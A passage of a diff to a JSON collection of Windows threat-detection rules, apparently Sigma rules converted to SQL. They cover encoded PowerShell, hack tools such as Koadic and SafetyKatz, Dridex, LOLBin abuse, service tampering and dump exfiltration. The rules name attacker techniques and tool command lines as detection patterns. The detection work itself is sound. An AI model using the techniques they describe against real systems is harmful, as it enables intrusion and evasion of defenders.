'\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" - ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" - }, - { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", - "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], + "filename": "proc_creation_win_hktl_koadic.yml" + }, + { + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "status": "experimental", + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Use of Mftrace.exe", - "id": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "title": "Stop Windows Service Via Sc.EXE", + "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "status": "experimental", - "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the stopping of a Windows service", + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate use for tracing purposes" + "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR OriginalFileName = 'mftrace.exe') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) OR ParentProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_mftrace.yml" + "filename": "proc_creation_win_sc_stop_service.yml" }, { - "title": "Exploiting CVE-2019-1388", - "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "status": "stable", - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "status": "test", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Suspicious Outlook Child Process", - "id": "208748f7-881d-47ac-a29c-07ea84bf691d", - "status": "test", - "description": "Detects a suspicious process spawning from an Outlook process.", - "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Parent in Public Folder Suspicious Process", - "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", - "status": "experimental", - "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", + "status": "test", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution" + ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential Suspicious Registry File Imported Via Reg.EXE", - "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate import of keys" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "Potential Dridex Activity", - "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "status": "stable", - "description": "Detects potential Dridex acitvity via specific process patterns", - "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", + "status": "test", + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unlikely" + "Administrative activity" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_dridex.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Potential Password Spraying Attempt Using Dsacls.EXE", - "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", "status": "experimental", - "description": "Detects possible password spraying attempts using Dsacls", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1218" + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use of dsacls to bind to an LDAP session" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_dsacls_password_spray.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "Explorer Process Tree Break", - "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "status": "test", - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", + "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", + "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "status": "experimental", + "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1204", + "attack.t1566.001", + "attack.execution", + "attack.initial_access" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_explorer_break_process_tree.yml" + "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" }, { - "title": "Suspicious Program Names", - "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "title": "HH.EXE Execution", + "id": "68c8acb4-1b60-4890-8e82-3ddf7a6dba84", "status": "test", - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"hh.exe\" to execute \".chm\" files.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Dan Beavin), oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.001" + ], "falsepositives": [ - "Legitimate tools that accidentally match on the searched patterns" + "False positives are expected with legitimate \".CHM\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR 